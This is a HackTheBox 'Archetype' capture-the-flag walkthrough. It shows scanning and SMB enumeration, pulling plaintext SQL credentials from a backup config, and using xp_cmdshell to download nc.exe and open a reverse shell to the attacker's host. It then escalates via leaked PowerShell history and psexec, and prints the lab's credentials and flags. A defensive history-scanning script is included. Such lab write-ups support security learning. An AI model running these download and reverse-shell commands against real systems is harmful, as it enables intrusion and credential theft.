HackTheBox - ArchType

Hack The Box Academy first machine: Archetype. If you are beginning with CTFs, here is a little help.

Pre-requisites: yes, it is a basic machine and we have just started, but it would still be better to have an idea of
nmap, SMB, smbclient, psexec, git clone, mssqlclient.py (and its basic commands), impacket, basic Windows commands, the python web server, and netcat.

First we connect, get the IP of the machine and scan for open ports only.

We now run aggressive scans only on the ports detected in step 1 (135, 139, 445, 1433, 47001, 49668); alternatively, you can start from here with -p- to scan all ports.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/Archtype]
└─$ sudo nmap -sV -sC -A -O -T5 -p135,139,445,47001,49668,1433 10.10.10.27 -oA Archtype -vv
[sudo] password for abhinav: 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-15 20:14 IST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:14
Completed NSE at 20:14, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:14
Completed NSE at 20:14, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:14
Completed NSE at 20:14, 0.00s elapsed
Initiating Ping Scan at 20:14
Scanning 10.10.10.27 [4 ports]
Completed Ping Scan at 20:14, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:14
Completed Parallel DNS resolution of 1 host. at 20:14, 0.33s elapsed
Initiating SYN Stealth Scan at 20:14
Scanning 10.10.10.27 [6 ports]
Discovered open port 139/tcp on 10.10.10.27
Discovered open port 445/tcp on 10.10.10.27
Discovered open port 135/tcp on 10.10.10.27
Discovered open port 49668/tcp on 10.10.10.27
Discovered open port 1433/tcp on 10.10.10.27
Discovered open port 47001/tcp on 10.10.10.27
Completed SYN Stealth Scan at 20:14, 0.42s elapsed (6 total ports)
Initiating Service scan at 20:14
Scanning 6 services on 10.10.10.27
Completed Service scan at 20:16, 62.65s elapsed (6 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.27
Initiating Traceroute at 20:16
Completed Traceroute at 20:16, 0.02s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 20:16
Completed Parallel DNS resolution of 2 hosts. at 20:16, 0.34s elapsed
NSE: Script scanning 10.10.10.27.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 22.62s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 1.99s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 0.00s elapsed
Nmap scan report for 10.10.10.27
Host is up, received reset ttl 128 (0.045s latency).
Scanned at 2021-06-15 20:14:56 IST for 92s

PORT      STATE SERVICE      REASON          VERSION
135/tcp   open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack ttl 128 Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp  open  ms-sql-s     syn-ack ttl 128 Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-06-15T14:42:50
| Not valid after:  2051-06-15T14:42:50
| MD5:   6121 7eba 5d98 d31d 8323 934b 0cea a2c4
| SHA-1: e43f 3457 4f9d e534 91bb 3017 97a1 8af5 f43b b6e3
|_ssl-date: 2021-06-15T15:04:39+00:00; +18m12s from scanner time.
47001/tcp open  http         syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49668/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows XP|7|2012
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012
OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=6/15%OT=135%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=60C8BD44%P=x
OS:86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=103%TS=U)OPS(O1=M5B4%O2=M5B4%O3=
OS:M5B4%O4=M5B4%O5=M5B4%O6=M5B4)WIN(W1=FAF0%W2=FAF0%W3=FAF0%W4=FAF0%W5=FAF0
OS:%W6=FAF0)ECN(R=Y%DF=N%TG=80%W=FAF0%O=M5B4%CC=N%Q=)T1(R=Y%DF=N%TG=80%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=N%TG=80%W=FAF0%S=O%A=S+%F=AS%O=M5B4%R
OS:D=0%Q=)T4(R=Y%DF=N%TG=80%W=7FFF%S=A%A=Z%F=R%O=%RD=0%Q=)T6(R=Y%DF=N%TG=80
OS:%W=7FFF%S=A%A=Z%F=R%O=%RD=0%Q=)U1(R=N)IE(R=Y%DFI=N%TG=80%CD=Z)

Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Busy server or unknown class
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h42m12s, deviation: 3h07m52s, median: 18m11s
| ms-sql-info: 
|   10.10.10.27:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 53066/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 49748/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 45578/udp): CLEAN (Timeout)
|   Check 4 (port 63282/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-06-15T08:04:20-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-06-15T15:04:17
|_  start_date: N/A

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   0.46 ms 192.168.252.2
2   0.45 ms 10.10.10.27

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.84 seconds
           Raw packets sent: 54 (4.316KB) | Rcvd: 39 (2.108KB)
┌──(abhinav㉿ETHICALHACKX)-[~/htb/Archtype]
└─$ 

As we see SMB is open, let's find out more about the shares.

┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ smbclient -L \\\\10.10.10.27\\     
Enter WORKGROUP\abhinav's password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	backups         Disk      
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available

We can check which SMB shares we are able to access. Let's get into backups and look at its contents, the file prod.dtsConfig. We can use the get command in the connected smbclient session to download the file to our local machine.

┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ smbclient //10.10.10.27/backups
Enter WORKGROUP\abhinav's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Jan 20 17:50:57 2020
  ..                                  D        0  Mon Jan 20 17:50:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 17:53:02 2020

		10328063 blocks of size 4096. 8259190 blocks available
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> ^C

The contents of the file are shown below; we can see a username and password for a user:

<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>

From the detailed nmap scan we know port 1433 has SQL Server on it, so let's try to connect using the username and password from the file we got in the backups share.
I would also suggest getting a git clone of impacket from https://github.com/SecureAuthCorp/impacket . It is much better if it is installed properly and run from within the cloned folder.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/Archtype]
└─$ python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py ARCHTYPE/sql_svc@ArchType.HTB -windows-auth
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands
SQL> 

We now need netcat, which we first host on our machine using the python web server. We can get nc.exe from GitHub at https://github.com/int0x33/nc.exe/blob/master/nc.exe

┌──(abhinav㉿ETHICALHACKX)-[~/htb/Archtype]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.27 - - [16/Jun/2021 00:40:31] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.27 - - [16/Jun/2021 00:44:44] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.27 - - [16/Jun/2021 00:45:39] "GET /winpeas.bat HTTP/1.1" 200 -
10.10.10.27 - - [16/Jun/2021 00:48:28] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.27 - - [16/Jun/2021 00:50:25] "GET /nc.exe HTTP/1.1" 200 -
SQL> enable_xp_cmdshell
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell "powershell wget -UseBasicParsing http://10.10.16.59:8000/nc.exe -OutFile %temp%/nc.exe"
output
--------------------------------------------------------------------------------
NULL

Now we start a netcat listener on any port and execute netcat on the target machine too.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/Archtype]
└─$ nc -nlvp 1234
listening on [any] 1234 ...

and we execute nc from the target machine too:

SQL> xp_cmdshell "%temp%/nc.exe -nv 10.10.16.59 1234 -e cmd.exe"

We now get back to netcat, where the listener has an active connection; let's try to grab the user flag and root flag.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/Archtype]
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.16.59] from (UNKNOWN) [10.10.10.27] 49676
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd %userprofile%
cd %userprofile%

C:\Users\sql_svc>cd desktop
cd desktop

C:\Users\sql_svc\Desktop>dir

dir
 Volume in drive C has no label.
 Volume Serial Number is CE13-2325

 Directory of C:\Users\sql_svc\Desktop

01/20/2020  06:42 AM    <DIR>          .
01/20/2020  06:42 AM    <DIR>          ..
02/25/2020  07:37 AM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  33,786,163,200 bytes free

C:\Users\sql_svc\Desktop>
C:\Users\sql_svc\Desktop>type user.txt
type user.txt
3e7b102e78218e935bf3f4951fec21a3
C:\Users\sql_svc\Desktop>cd ..
cd ..

C:\Users\sql_svc>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is CE13-2325

 Directory of C:\Users\sql_svc

01/20/2020  06:01 AM    <DIR>          .
01/20/2020  06:01 AM    <DIR>          ..
01/20/2020  06:01 AM    <DIR>          3D Objects
01/20/2020  06:01 AM    <DIR>          Contacts
01/20/2020  06:42 AM    <DIR>          Desktop
01/20/2020  06:01 AM    <DIR>          Documents
01/20/2020  06:01 AM    <DIR>          Downloads
01/20/2020  06:01 AM    <DIR>          Favorites
01/20/2020  06:01 AM    <DIR>          Links
01/20/2020  06:01 AM    <DIR>          Music
01/20/2020  06:01 AM    <DIR>          Pictures
01/20/2020  06:01 AM    <DIR>          Saved Games
01/20/2020  06:01 AM    <DIR>          Searches
01/20/2020  06:01 AM    <DIR>          Videos
               0 File(s)              0 bytes
              14 Dir(s)  33,834,094,592 bytes free

C:\Users\sql_svc>cd ..
cd ..

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is CE13-2325

 Directory of C:\Users

01/19/2020  04:10 PM    <DIR>          .
01/19/2020  04:10 PM    <DIR>          ..
01/19/2020  11:39 PM    <DIR>          Administrator
01/19/2020  11:39 PM    <DIR>          Public
01/20/2020  06:01 AM    <DIR>          sql_svc
               0 File(s)              0 bytes
               5 Dir(s)  33,833,717,760 bytes free

C:\Users>cd Administrator
cd Administrator
Access is denied.

C:\Users>

We got the user flag, but not the root flag yet.

Let us dig more and try to find something in the command history; let's look at the PowerShell command history.

C:\Users\sql_svc\AppData\Local\Microsoft\Windows\PowerShell>cd %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

net.exe use T: \\Archetype\backups /user: administrator MEGACORP_4dmin!! 
exit

So we see the administrator username, and the password is MEGACORP_4dmin!!
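The PSReadLine history above is a classic place for credentials to leak. As an added example (not from the original post), a Python scan over a constructed ConsoleHost_history.txt that flags commands carrying a password inline (net use with /user:, cmdkey with /pass:) and reports only a redacted length; the host names, users and passwords in the sample are placeholders.

```python
import re

# Constructed sample of a PSReadLine ConsoleHost_history.txt. Line 2 mirrors the
# shape of the `net.exe use ... /user:` entry found on the box, with placeholder
# values; the `*` form on a real box prompts for the password and leaks nothing.
SAMPLE_HISTORY = """Get-ChildItem C:\\backups
net.exe use T: \\\\EXAMPLE-HOST\\backups /user: administrator EXAMPLE_P4ss!!
net use S: \\\\EXAMPLE-HOST\\share /user:EXAMPLE\\svc EXAMPLE_Secret
$cred = Get-Credential
cmdkey /add:EXAMPLE-HOST /user:backup /pass:EXAMPLE_Pass
net use R: \\\\EXAMPLE-HOST\\share /user:bob *
exit
"""

# net use: "/user:" may be followed by a space (as in the history above), then the
# user name and, when the operator typed it, the password as the next token.
NET_USE = re.compile(r"^\s*net(?:\.exe)?\s+use\b.*?/user:\s*(\S+)\s+(\S+)", re.IGNORECASE)
# cmdkey stores credentials in Credential Manager; /pass: carries the password inline.
CMDKEY = re.compile(r"^\s*cmdkey\b.*?/user:(\S+).*?/pass:(\S+)", re.IGNORECASE)

def redact(secret):
    """Keep only the length, so the report cannot be used to recover the value."""
    return "*" * len(secret)

def find_history_credentials(text):
    """Return (line_no, tool, user, redacted_secret) for each command whose
    password was typed inline. A bare '*' after the user is an interactive
    prompt, not a leaked secret, so it is skipped."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        for tool, rx in (("net use", NET_USE), ("cmdkey", CMDKEY)):
            m = rx.search(line)
            if m and m.group(2) != "*":
                hits.append((no, tool, m.group(1), redact(m.group(2))))
                break
    return hits

if __name__ == "__main__":
    for no, tool, user, masked in find_history_credentials(SAMPLE_HISTORY):
        print(f"line {no}: {tool} as {user}, inline password {masked}")
```

On a real host the file lives under %APPDATA%\Microsoft\Windows\PowerShell\PSReadline\ for each user; a finding means the password should be rotated and the history line removed.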

Let's now use psexec, which lets you execute commands on the remote system after login.
Note: if the modules are not properly installed, you might spend the rest of your day trying to fix the errors.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/Archtype/impacket/examples]
└─$ psexec.py Administrator@10.10.10.27 cmd
Impacket v0.9.24.dev1+20210611.72516.1a5ed9dc - Copyright 2021 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.27.....
[*] Found writable share ADMIN$
[*] Uploading file GCtlWvSE.exe
[*] Opening SVCManager on 10.10.10.27.....
[*] Creating service JBxd on 10.10.10.27.....
[*] Starting service JBxd.....
[!] Press help for extra shell commands

So now we can check further, as we now have root/admin access.

Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>cd c:/users/administrator

c:\Users\Administrator>cd desktop

c:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is CE13-2325

 Directory of c:\Users\Administrator\Desktop

01/20/2020  06:42 AM    <DIR>          .
01/20/2020  06:42 AM    <DIR>          ..
02/25/2020  07:36 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  33,832,914,944 bytes free

c:\Users\Administrator\Desktop>type root.txt
b91ccec3305e98240082d4474b848528
c:\Users\Administrator\Desktop>

I would not say the box was very simple to get around, since the python modules we used were broken; we would not know how and what to use for a starting-point machine, especially if you are not an experienced CTF player.
